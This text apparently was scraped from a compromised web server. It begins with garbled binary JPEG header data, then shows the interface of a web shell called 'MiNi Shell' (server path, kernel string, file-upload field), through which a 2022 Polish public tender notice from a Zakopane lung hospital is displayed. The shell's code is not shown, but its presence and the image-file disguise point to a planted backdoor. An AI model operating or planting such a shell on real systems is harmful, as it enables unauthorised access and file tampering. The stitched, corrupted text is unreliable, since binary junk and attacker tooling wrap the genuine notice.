JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220415/0012454601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie wielobranżowej dokumentacji projektowej technicznej i wykonawczej . </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Specjalistyczny Chorób Płuc &#34;Odrodzenie&#34; im. Klary Jelskiej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000295171</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Gładkie 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zakopane</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">b.kreft@szpitalodrodzenie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpitalodrodzenie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie wielobranżowej dokumentacji projektowej technicznej i wykonawczej . </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5fc5798b-bc9c-11ec-b879-9a86e5ac3946</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00124546</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00060343/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Projekt wykonawczy dobudowy nowego skrzydła szpitala</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://szpitalodrodzenie.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W przedmiotowym postępowaniu komunikacja między Zamawiającym a<br/>Wykonawcami, odbywa się za pośrednictwem Platformy znajdującej się pod adresem: https://szpitalodrodzenie.ezamawiajacy.pl<br/>2. Przekazywanie sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji następuje:<br/>2.1 za pośrednictwem Platformy znajdującej się pod adresem<br/>https://szpitalodrodzenie.ezamawiajacy.pl w zakładce „Korespondencja”<br/>2.2 dopuszcza się również komunikację za pomocą poczty elektronicznej na adres email: b.kreft@szpitalodrodzenie.pl<br/>Ofertę można złożyć tylko na wskazanej platformie pod adresem<br/>https://szpitalodrodzenie.ezamawiajacy.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający, określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>1.1 Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>1.2 Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>1.3 Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet<br/>Explorer minimalnie wersja 10.0;<br/>1.4 Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>2. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods,<br/>odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv,<br/>zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>3. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>3.1 Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format<br/>kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>3.2 Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego odpowiednim źródłem czasu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Na podstawie artykułu 13 ust. 1 i ust. 2 oraz art. 6 ust. 1 lit. c Rozporządzenia Parlamentu<br/>Europejskiego I Rady (EU) 2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólnego rozporządzenia<br/>o ochronie danych tj. RODO), informujemy, że<br/>1. Administratorem Pani/Pana danych osobowych jest Szpital Specjalistyczny Chorób Płuc „Odrodzenie” im. Klary Jelskiej w<br/>Zakopanem z siedzibą: 34 – 500 Zakopane, ul. Gładkie 1, wpisany do Krajowego Rejestru Sądowego pod numerem 0000007565,<br/>wpisany przez Wojewodę Małopolskiego do Rejestru Podmiotów Wykonujących Działalność Leczniczą pod numerem<br/>000000006064, posiadający numer NIP 736-14-54-134, REGON 000295171, tel. 18 20 016 26, fax.18 20 146 32, e-mail:<br/>administracja@szpitalodrodzenie.pl, www.szpitalodrodzenie.pl<br/>2. Kontakt z Inspektorem Ochrony Danych – e-mail: iod@szpitalodrodzenie.pl<br/>3. Pani/Pana dane osobowe przetwarzane będą w celu związanym z postępowaniem o udzielenie zamówienia publicznego na<br/>Wykonanie wielobranżowej dokumentacji projektowej technicznej i wykonawczej inwestycji pn: „Poprawa dostępności i jakości<br/>świadczeń w Szpitalu Specjalistycznym Chorób Płuc „Odrodzenie” im. Klary Jelskiej w Zakopanem jako ograniczenie negatywnych<br/>skutków Covid-19 poprzez rozbudowę, dobudowę i przebudowę głównego skrzydła budynku szpitala&#34;, znak referencyjny A.ZP.271-<br/>3a/22<br/>4. Odbiorcami Pani/Pana danych osobowych będą:<br/>4.3 osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z<br/>dnia 11 września 2019 r. – Prawo zamówień publicznych,<br/>4.4 dla postępowań przetargowych prowadzonych w ramach Platformy eZamawiający odbiorcami Pani/Pana danych osobowych<br/>będzie spółka Otwarty Rynek Elektroniczny S.A. z siedzibą: 02 - 672 Warszawa, ul. Domaniewska 49, wpisana do Krajowego<br/>Rejestru Sądowego pod numerem 0000041441, posiadająca numer NIP 526 - 25 - 35 - 153, numer REGON 017282436, właściciel<br/>Platformy Zakupowej, na której Administrator danych osobowych prowadzi postępowania o udzielenie zamówienia publicznego,<br/>działającej pod adresem: https://szpitalodrodzenie.ezamawiajacy.pl5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Prawo zamówień publicznych, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy.<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Prawo zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Prawo Zamówień Publicznych.<br/>7. Pani/Pana dane osobowe nie są przekazywane do odbiorców w państwach trzecich, tj. poza Europejski Obszar Gospodarczy<br/>(EOG) lub do organizacji międzynarodowych.<br/>8. W związku z przetwarzaniem Pani/Pana danych osobowych przysługuje Pani/Panu prawo do:<br/>• żądania od Administratora Danych Osobowych dostępu do swoich danych osobowych, ich sprawdzenia, sprostowania , zgodnie z<br/>art. 15, 16 RODO,<br/>• ograniczenia ich przetwarzania , zgodnie z art. 18 ust. 2 RODO,<br/>• wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych<br/>Pani/Pana dotyczących narusza przepisy RODO.<br/>Pozostałe informacje w rozdziale XXV SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">A.ZP-271-3a/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: wykonanie wielobranżowej dokumentacji projektowej technicznej i wykonawczej wraz z<br/>pełnieniem nadzoru autorskiego (opcja), inwestycji pn: &#34;Poprawa dostępności i jakości świadczeń w Szpitalu Specjalistycznym Chorób Płuc „Odrodzenie” im. Klary Jelskiej w Zakopanem jako ograniczenie negatywnych skutków Covid-19 poprzez rozbudowę, dobudowę i przebudowę głównego skrzydła budynku szpitala&#34;.<br/>2. Przedmiot inwestycji, której dotyczy wykonanie dokumentacji oraz nadzór autorski o których mowa w ust.1, jest dobudowa<br/>nowego skrzydła budynku wraz z przebudową fragmentu istniejącego gmachu (w miejscu połączenia) oraz przebudowa<br/>kolidujących elementów infrastruktury technicznej tj. przebudowa sieci cieplnej, sieci oraz przyłączy kanalizacja sanitarnej i<br/>deszczowej, sieci oraz przyłączy energetycznych i telekomunikacyjnych, a także przyłącz gazów medycznych.<br/>2.1 Zakres rzeczowy obejmuje dobudowę skrzydła budynku w nawiązaniu do istniejącego gmachu (do obecnej kalenicy) w<br/>miejscu połączenia z dachem. Dobudowa i przebudowa obejmuje wykonanie 7 kondygnacyjnego (5 pięter licząc od wejścia<br/>głównego) budynku (skrzydła) wydzielonego jako odrębna strefa pożarowa. Założenia ogólne:<br/>1) Przyziemie - pomieszczenia techniczne i uzupełniające<br/>2) Parter niski - izba przyjęć<br/>3) Parter wysoki - poradnie specjalistyczne z gabinetami lekarskimi<br/>4) I piętro - oddział łóżkowy<br/>5) II piętro - oddział łóżkowy<br/>6) III piętro - oddział łóżkowy<br/>7) IV piętro - laboratorium szpitalne<br/>8) Strych - wentylatornia dla potrzeb laboratorium.<br/>2.2 Inwestycja ma na celu dostosowanie budynku do obowiązujących przepisów prawa. Obecnie szpital nie spełnia pod<br/>względem lokalowym:<br/>1) Warunków dotyczących izby przyjęć wraz z wydzieleniem separatki dla osób zakaźnie chorych. Planowana lokalizacja na<br/>niskim parterze rozbudowywanego budynku.<br/>2) Warunków lokalowych poradni specjalistycznych. Planowana lokalizacja na wysokim parterze rozbudowywanego<br/>budynku.<br/>3) Zwiększenie standardu pobytu pacjentów - planowana budowa oddziału łóżkowego z pełnymi węzłami sanitarnymi.<br/>Planowana lokalizacja na I, II, III piętrze rozbudowywanego budynku.<br/>4) Rozbudowa laboratorium szpitalnego. Planowana lokalizacja na IV piętrze (poddaszu) rozbudowywanego budynku.<br/>5) Całość inwestycji ma dostosować budynek szpitala do obowiązujących przepisów sanitarnych z uwzględnieniem separacji<br/>pacjentów szpitalnych (pobyt dłuższy na terenie szpitala) i przychodzących do poradni (wizyty jednorazowe) w tym w<br/>szczególności chorób zakaźnych, również wirusa Covid 19.<br/>3. Zakres przedmiotu zamówienia o którym mowa w ust.1 obejmuje w szczególności:<br/>3.1 Wykonanie projektu technicznego w branżach:<br/>1) konstrukcyjnej;<br/>3) c.o.;<br/>4) wentylacyjne;<br/>5) gazów medycznych;<br/>6) elektrycznej i niskoprądowej;<br/>7) telekomunikacyjnej;<br/>8) drogowej<br/>Projekty techniczne należy wykonać w szczegółowości umożliwiającej ogłoszenie postępowania przetargowego i wykonanie robót budowlanych, w tym zawierające zestawienie materiałów w ilości po 3 egz. każdej branży w wersji papierowej.<br/>3.2 Uzyskanie wszystkich niezbędnych zgód i pozwoleń w tym administracyjnych, jeśli będą wymagane.<br/>3.3 Wykonanie projektów wykonawczych architektury w ilości - 3 egz. w wersji papierowej;<br/>3.4 Wykonanie projektu technologicznego wraz z zestawieniem wyposażenia w ilości - 3 egz. w wersji papierowej;<br/>3.5 Wykonanie projektowanej charakterystyki energetycznej obiektu w ilości - 3 egz. w wersji papierowej;<br/>3.6 Wykonanie kosztorysów inwestorskich wraz przedmiarami robót w ilości - 2 egz. w wersji papierowej.<br/>3.7 Wykonanie STWIOR – Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych - 3 egz. w wersji papierowej.<br/>3.8 Nadzór autorski (opcja) – przewidywane 10 pobytów wielobranżowych podczas trwania robót budowlanych.<br/>Całość dokumentacji w formacie pdf i kosztorys inwestorski w formacie xml na nośniku elektronicznym - 1 egz.<br/>4. Wskazana w pkt.3 dokumentacja musi stanowić gotowy opis przedmiotu zamówienia dla przyszłego postępowania o<br/>udzielenie zamówienia publicznego na wykonanie robót budowlanych przedmiotowej inwestycji zgodnie z przepisami<br/>ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz.U.2021 poz. 1129 ze zm.). Wykonawca będzie<br/>zobowiązany do współpracy przy przeprowadzeniu procedury przetargowej na wyłonienie wykonawców Inwestycji w<br/>zakresie robót budowlanych przedmiotowej inwestycji, poprzez formułowanie odpowiedzi na pytania oraz zarzuty dotyczące<br/>przedmiotu Umowy w zakresie merytorycznej zawartości Dokumentacji i rozwiązań projektowych będących przedmiotem<br/>zamówienia niniejszego postępowania.<br/>Podstawą do opracowania dokumentacji o której mowa w ust.1 jest dokumentacja projektowa budowlana wraz z<br/>uzgodnieniami w skład której wchodzi:<br/>- projekt zagospodarowania terenu (w wersji rysunkowej i opisowej);<br/>- projekt architektoniczno-budowlany (w wersji rysunkowej i opisowej);<br/>- dokumentacja geotechniczna<br/>- warunki i uzgodnienia z zarządcami sieci, w tym :<br/>- warunki przełożenia sieci teletechnicznej (Orange)<br/>- warunki przebudowy i zabezpieczenia infrastruktury ciepłowniczej (PEC Geotermia Podhalańska)<br/>- warunki przyłączenia do sieci ciepłowniczej (PEC Geotermia Podhalańska)<br/>- warunki przyłączenia do sieci wodociągowej i kanalizacyjnej (SEWIK)<br/>Powyżej wskazana dokumentacja stanowi załącznik nr 1 do SWZ w formacie PDF.<br/>Cały budynek szpitala posiada instalację sygnalizacji pożaru z powiadomieniem do PSP w Zakopanem - dobudowywane<br/>skrzydło należy wyposażyć i zintegrować z istniejącym systemem SAP.<br/>Zamawiający informuje, że jest w trakcie uzyskiwania pozwolenia na budowę procedowaną w Starostwie Powiatu<br/>Tatrzańskiego w Zakopanem. Przewidywany termin uzyskania pozwolenia na budowę kwiecień 2022r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje zastosowanie prawa opcji. Zakres opcjonalny (opcja) obejmuje pełnienie nadzoru autorskiego. Opis<br/>sposobu skorzystania z opcji oraz opis i zakres zamówienia opcjonalnego zawiera załącznik nr 8 do SWZ - projekt umowy<br/>§5. Maksymalna wartość opcji to 10 pobytów Wykonawcy w okresie prowadzonych robót budowlanych, w związku z<br/>realizacją Nadzoru autorskiego. Zamawiający zastrzega sobie prawo do skorzystania z prawa opcji, w terminie 36 miesięcy<br/>od daty podpisania protokołu odbioru końcowego. O skorzystaniu z opcji Zamawiający poinformuje Wykonawcę w formie<br/>pisemnej i będzie to równoznaczne ze złożeniem przez Zamawiającego oświadczenia o skorzystaniu z opcji w zakresie<br/>określonym w Umowie. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">56 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób wyznaczonych do realizacji zamówienia - głównego projektanta architekta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące<br/>zdolności technicznej lub zawodowej:<br/>Zamawiający uzna za spełniony warunek dotyczący sytuacji technicznej lub zawodowej, jeżeli wykonawca wykaże że:<br/>1) w okresie ostatnich 3 lat przed upływem terminu składania ofert (jeżeli okres prowadzenia działalności jest krótszy, to w<br/>tym okresie), wykonał należycie co najmniej 1 wielobranżową dokumentację projektowo-kosztorysową, budynku obiektu<br/>użyteczności publicznej, o kubaturze min. 5000 m3.<br/>Przez budynki użyteczności publicznej należy rozumieć obiekty wg. definicji zawartej w § 3 ust. 6 Rozporządzenia Ministra<br/>Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich<br/>usytuowanie (Dz. U. z 2019 poz.1065).<br/>2) dysponuje osobami zdolnymi do wykonania zamówienia. Wykonawca zobowiązany jest załączyć wykaz osób, które będą<br/>wykonywać zamówienie (przewidzianych do realizacji) wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>doświadczenia i wykształcenia. Z wykazu winno wynikać, iż Wykonawca dysponuje minimum:<br/>a) architektem (główny projektant) - co najmniej jedna osoba, która posiada uprawnienia budowlane do projektowania bez<br/>ograniczeń w specjalności architektonicznej bez ograniczeń,<br/>b) konstruktor - co najmniej jedną osobą, która posiada 